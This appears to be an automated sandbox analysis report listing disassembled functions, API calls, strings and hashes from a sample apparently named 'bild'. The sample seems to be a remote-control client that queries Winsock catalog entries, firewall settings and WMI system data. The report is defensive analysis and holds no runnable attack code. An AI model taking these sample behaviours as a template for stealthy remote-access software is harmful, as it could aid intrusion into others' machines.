                                                                                    • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                    • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                    • API String ID: 4251163631-545709139
                                                                                    • Opcode ID: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                    • Instruction ID: 76ed8f4553af2ae4cc76032582d3c5cf4b75be54885724a55a46303ac3459834
                                                                                    • Opcode Fuzzy Hash: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                    • Instruction Fuzzy Hash: 07313971E002299BD761DF74D984BE9F7B6EB08729F540164E42DC7A80D7344984CF91
                                                                                    Function 11015010 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 110150CA
                                                                                    • _memset.LIBCMT ref: 1101510E
                                                                                    • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015148
                                                                                    Strings
                                                                                    • PackedCatalogItem, xrefs: 11015132
                                                                                    • NSLSP, xrefs: 11015158
                                                                                    • %012d, xrefs: 110150C4
                                                                                    • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101504B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: QueryValue_memsetwsprintf
                                                                                    • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                    • API String ID: 1333399081-1346142259
                                                                                    • Opcode ID: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                    • Instruction ID: d38f3a4d66d5a90606c53f5b1b84405609ec5bb3b13ff7cea0d7775b25b40b12
                                                                                    • Opcode Fuzzy Hash: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                    • Instruction Fuzzy Hash: C6419D71D02269AFEB11DB64CC90BDEF7B8EB44314F0445E9E819A7281EB35AB48CF50
                                                                                    Function 1100FDC0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100FDED
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100FE10
                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 1100FE94
                                                                                    • __CxxThrowException@8.LIBCMT ref: 1100FEA2
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100FEB5
                                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FECF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                    • String ID: bad cast
                                                                                    • API String ID: 2427920155-3145022300
                                                                                    • Opcode ID: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                    • Instruction ID: 563b417412927bd42dfe2d2268ce551a617b01fe8fe711e168dc892134580a96
                                                                                    • Opcode Fuzzy Hash: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                    • Instruction Fuzzy Hash: 5731E975D002669FD711DF94C890BAEF7B8EB04B68F10426DD921A7291DB717D40CB92
                                                                                    Function 11144BD0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                    • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                    • API String ID: 3494822531-1878648853
                                                                                    • Opcode ID: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                    • Instruction ID: dd955378f98185685044f21f066d1e50e049b7277ab8e5714ac6db0ba135c9a8
                                                                                    • Opcode Fuzzy Hash: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                    • Instruction Fuzzy Hash: AB518835D4022E5BD711CF24DC50BDEF7A4AF15B08F2401A4D8997BA80EBB27B84CBA5
                                                                                    Function 11107290 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                    • std::exception::exception.LIBCMT ref: 11107414
                                                                                    • __CxxThrowException@8.LIBCMT ref: 11107429
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                    • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                    • API String ID: 2851125068-2390547818
                                                                                    • Opcode ID: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                    • Instruction ID: 20da51148d2406ef940ba90f631bbe284ff6dbb95dc7cb8c25b5cdc78ae8e1aa
                                                                                    • Opcode Fuzzy Hash: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                    • Instruction Fuzzy Hash: 2A4115B4D09B449FC761CF6A8940BDAFBE8EFA9604F00490EE5AE93210D7797500CF56
                                                                                    Function 11017300 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 1101733C
                                                                                    • CoInitialize.OLE32(00000000), ref: 11017345
                                                                                    • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                    • CoUninitialize.COMBASE ref: 110173D0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                    • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                    • API String ID: 2407233060-578995875
                                                                                    • Opcode ID: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                    • Instruction ID: df925c951649f52390f194a40c23bf9fa59b5f59fb7a44760539d7ccd5920114
                                                                                    • Opcode Fuzzy Hash: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                    • Instruction Fuzzy Hash: 7F2137B5E041259BDB11DFA0CC46BBAB6E8AF40308F0040B9EC69DB184FA79E940D7A1
                                                                                    Function 11017220 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 11017252
                                                                                    • CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                    • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                    • CoUninitialize.COMBASE ref: 110172E0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                    • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                    • API String ID: 2407233060-2037925671
                                                                                    • Opcode ID: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                    • Instruction ID: c2f3c346b695d23426c96ecc328f7bdb1aeadc280033f44fb53199f8ba8604cb
                                                                                    • Opcode Fuzzy Hash: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                    • Instruction Fuzzy Hash: 19210575E016299BD712DFE0CC45BEEB7E89F80718F0001A8FC29DB184EA7AE945C761
                                                                                    Function 111386B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 1113879C
                                                                                    • DoICFConfig() OK, xrefs: 11138786
                                                                                    • AutoICFConfig, xrefs: 11138700
                                                                                    • Client, xrefs: 11138705
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountTick
                                                                                    • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                    • API String ID: 536389180-1512301160
                                                                                    • Opcode ID: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                    • Instruction ID: a0019f70d98f4d819e239f855ef0bc8db2e19db1671bc02c3e0d3b7677daedde
                                                                                    • Opcode Fuzzy Hash: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                    • Instruction Fuzzy Hash: E4210578A247AB4AFB039B759ED4755FB83578073EF450278DE10862CCDB74A458CB42
                                                                                    Function 11096970 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 11096984
                                                                                    • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                    • CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                    • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                    • API String ID: 3222248624-258972079
                                                                                    • Opcode ID: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                    • Instruction ID: ffe5b7852bae71a5603cb4f529131e3535c43cf5cc9a129c5e7f13935f1cb029
                                                                                    • Opcode Fuzzy Hash: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                    • Instruction Fuzzy Hash: 9C11AC74E0012DABC700EAE5DC95AEFBB68AF45709F100029F50AEB144EA21EA40C7E2
                                                                                    Function 11025D00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11025D16
                                                                                    • K32GetProcessImageFileNameA.KERNEL32(?,?,?,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D32
                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025D46
                                                                                    • SetLastError.KERNEL32(00000078,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D69
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                    • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                    • API String ID: 4186647306-532032230
                                                                                    • Opcode ID: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                    • Instruction ID: 74662284ed99b9a54ad109221a671fe8fcdc3fa540ca7c31caa090441a4958f5
                                                                                    • Opcode Fuzzy Hash: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                    • Instruction Fuzzy Hash: 98016D72601718ABE330DEA5EC48F87B7E8EB88765F10052AF95697200D631E8018BA4
                                                                                    Function 1110F2B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                    • CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                    • CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
